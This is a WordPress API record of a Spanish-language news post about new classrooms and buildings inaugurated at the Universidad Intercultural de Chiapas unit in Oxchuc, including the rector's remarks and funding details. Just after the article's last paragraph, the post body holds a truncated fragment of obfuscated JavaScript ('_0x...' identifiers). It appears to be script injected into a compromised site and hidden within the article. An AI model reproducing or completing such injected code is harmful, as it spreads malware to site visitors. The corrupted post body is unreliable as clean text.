{"id":17796,"date":"2024-09-11T02:03:32","date_gmt":"2024-09-11T02:03:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17796"},"modified":"2024-09-11T02:03:33","modified_gmt":"2024-09-11T02:03:33","slug":"se-inauguran-nuevas-aulas-en-la-unich-de-oxchuc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17796","title":{"rendered":"Se inauguran nuevas aulas en la UNICH de Oxchuc"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-17797\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-10-at-5.57.32-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>10 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Acompa\u00f1ado del Subsecretario de Educaci\u00f3n Superior, Luciano Concheiro B\u00f3rquez, y Mar\u00eda de los \u00c1ngeles Gordillo Casta\u00f1eda, coordinadora t\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa de la Subsecretar\u00eda de Educaci\u00f3n Superior de la SEP, el rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, inaugur\u00f3 nuevos edificios en la Unidad Acad\u00e9mica Multidisciplinaria en Oxchuc.<\/p>\n\n\n\n<p>\u201cHoy nos unimos para celebrar el 15 aniversario de esta bella instituci\u00f3n en el pueblo Tseltal, esta unidad Acad\u00e9mica. Estamos acompa\u00f1ando este d\u00eda para poder inaugurar los edificios, los espacios construidos en el 2023, pero dar inicio a las construcciones que corresponden al 2024l con recurso que nos ha programado y enviado nuestras autoridades federales, a trav\u00e9s de la subsecretarias de educaci\u00f3n Superior, as\u00ed como del gobierno del estado, a trav\u00e9s de nuestro gobernador, Rutilio Escand\u00f3n Cadenas, a quien enviamos un saludo\u201d, dijo.<\/p>\n\n\n\n<p>Durante su participaci\u00f3n en el acto protocolario, agradeci\u00f3 a la subsecretar\u00eda de educaci\u00f3n superior, a la Secretar\u00eda de Educaci\u00f3n de Chiapas, al gobierno del estado, al Director del INIFECH, ya que son quienes han apoyado en la ejecuci\u00f3n de estos proyectos, y que hoy ayudan a que los estudiantes tengan espacios dignos para recibir clases, \u201csiendo Oxchuc quien cuenta con una matr\u00edcula r\u00e9cord a lo largo de la historia de la universidad, resultado del trabajo en conjunto y en equipo\u201d.<\/p>\n\n\n\n<p>Toledo Hern\u00e1ndez detall\u00f3 que estas obras pertenecen al Programa Presupuestario U079, Programa de Expansi\u00f3n de la Educaci\u00f3n Media Superior y Superior <a href=\"PROEXES\">Tipo Superior<\/a> Ejercicio Fiscal 2023, y consiste en la construcci\u00f3n de un domo en plaza c\u00edvica para las actividades y eventos culturales, aula de usos M\u00faltiples y la adecuaci\u00f3n de espacios al aire libre con interconectividad, qu\u00e9 consta de palapas, mesas, bancas,<\/p>\n\n\n\n<p>As\u00ed mismo, en el Ejercicio Fiscal 2023, se autorizaron recursos con el Programa Fondo de Aportaciones M\u00faltiples (FAM), y se construy\u00f3 la primera etapa de edificio de 02 niveles para 08 aulas did\u00e1cticas y obra exterior en la Unidad Acad\u00e9mica Multidisciplinaria de Oxchuc.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 10 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Acompa\u00f1ado del Subsecretario de Educaci\u00f3n Superior, Luciano Concheiro B\u00f3rquez, y Mar\u00eda de los \u00c1ngeles Gordillo Casta\u00f1eda, coordinadora t\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa de la Subsecretar\u00eda de Educaci\u00f3n Superior de la SEP, el rector de la Universidad Intercultural de Chiapas (Unich), Dionicio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17797,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17796","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17796","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17796"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17796\/revisions"}],"predecessor-version":[{"id":17798,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17796\/revisions\/17798"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17797"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17796"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17796"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17796"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}